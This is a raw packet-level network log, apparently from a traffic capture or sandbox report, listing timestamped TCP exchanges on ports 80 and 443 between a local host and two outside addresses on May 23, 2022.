                                                    May 23, 2022 09:19:20.426511049 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426527023 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426544905 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426563025 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426578999 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426580906 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426598072 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426599026 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426604033 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426608086 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426618099 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426621914 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426635981 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426641941 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426655054 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426656008 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426672935 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426676035 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426686049 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426691055 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426712990 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426712036 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426726103 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426731110 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426748991 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426752090 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426764965 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426769972 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426783085 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426789045 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426806927 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426808119 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426817894 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426826954 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426843882 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426845074 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426853895 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426863909 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426881075 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426882029 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426889896 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426918983 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.427186012 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428570032 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428596973 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428615093 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428631067 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428637981 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428648949 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428661108 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428664923 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428668022 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428675890 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428685904 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428702116 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428704023 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428714991 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428730011 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574546099 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574584961 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574615002 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574645042 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574673891 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574702024 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574731112 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574759960 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574801922 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574800968 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574829102 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574831963 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574831963 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574835062 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574855089 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574882984 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574913025 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574940920 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574940920 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574944973 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574970961 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574970961 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575001001 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575021029 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575030088 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575031996 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575062037 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575073957 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575098991 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575114965 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575119019 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575154066 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575176954 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575192928 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575215101 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575231075 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575237989 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575270891 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575297117 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575309992 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575311899 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575349092 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575371981 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575388908 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575412035 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575427055 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575443983 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575464964 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575495958 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575506926 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575514078 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575544119 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575544119 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575582981 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575597048 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575620890 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575634003 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575659990 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575663090 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575699091 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575710058 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575736046 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575737000 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575776100 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575784922 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575814962 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575815916 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575854063 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575865030 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575894117 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575905085 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575932026 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575932980 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575970888 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575983047 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576009035 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576009989 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576046944 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576061964 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576086044 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576091051 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576123953 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576136112 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576162100 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576165915 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576200008 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576215982 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576237917 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576256990 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576277018 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576282024 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576316118 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576327085 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576354027 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576354027 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576391935 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576404095 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576431990 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576433897 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576472044 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576489925 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576546907 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576558113 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576584101 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576585054 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576621056 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576641083 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576662064 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576664925 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576702118 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576730013 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576766968 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576781034 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576797962 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576805115 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576837063 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576869011 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576905966 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576947927 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576982021 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576984882 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577001095 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577023983 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577029943 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577064037 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577091932 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577100039 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577119112 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577138901 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577143908 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577178001 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577207088 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577219963 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577224970 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577260971 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577270985 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577300072 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577300072 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577351093 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577361107 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577373981 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577392101 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577419996 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577429056 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577446938 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577466965 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577472925 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577516079 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.578320980 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.582521915 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.582582951 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.582628965 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.582640886 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.582674026 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.582674980 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.582741022 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.582753897 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.582766056 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.582782030 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.582797050 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.582824945 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.582843065 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.582866907 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.582880020 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.582901001 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.582921028 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.582942009 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.584444046 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.584990025 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:24.677239895 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:24.677288055 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:24.677370071 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:24.677947998 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:24.677968025 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.076318979 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.076524019 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.087781906 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.087815046 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.088269949 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.088366985 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.124990940 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.168502092 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.249968052 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.250071049 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.250103951 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.250130892 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.250144005 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.250169039 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.369380951 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.369487047 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.369496107 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.369513035 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.369558096 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.369751930 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.488594055 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.488688946 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.488816977 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.488841057 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.488874912 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.488924026 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.489084005 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.489275932 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.489356995 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.489409924 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.489428043 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.489480972 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.489515066 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.489829063 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.489912033 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.489933968 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.489944935 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.490020037 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.490041971 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.490127087 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.490345001 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.490417004 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.490467072 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.490478039 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.490576982 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.494240999 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.576395035 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:25.576499939 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:25.610358953 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.610449076 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.610537052 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.610557079 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.610578060 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.610622883 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.610697985 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.610949039 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.611031055 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.611080885 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.611098051 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.611112118 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.611164093 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.611259937 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.611498117 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.611578941 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.611624002 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.611639023 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.611656904 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.611696959 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.611859083 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.611936092 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.611938000 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.611955881 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.612013102 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.612252951 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.612334967 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.612350941 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.612366915 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.612464905 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.612507105 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.612720013 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.612795115 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.612978935 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.612998009 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.613236904 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.614202023 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.732690096 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.732795954 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.732991934 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.733036995 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.733263969 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.733345985 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.733822107 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.733954906 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.733994007 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.734477043 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.734580994 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.734764099 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.734782934 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.734828949 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.735275984 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.735411882 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.735646963 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.735665083 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.735739946 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.735955954 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.736052990 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.736062050 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.736078024 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.736105919 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.736124039 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.736793041 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.736938000 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.736943007 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.736963987 CEST44349174159.203.19.2192.168.2.22
                                                    May 23, 2022 09:19:25.737014055 CEST49174443192.168.2.22159.203.19.2
                                                    May 23, 2022 09:19:25.737531900 CEST44349174159.203.19.2192.168.2.22
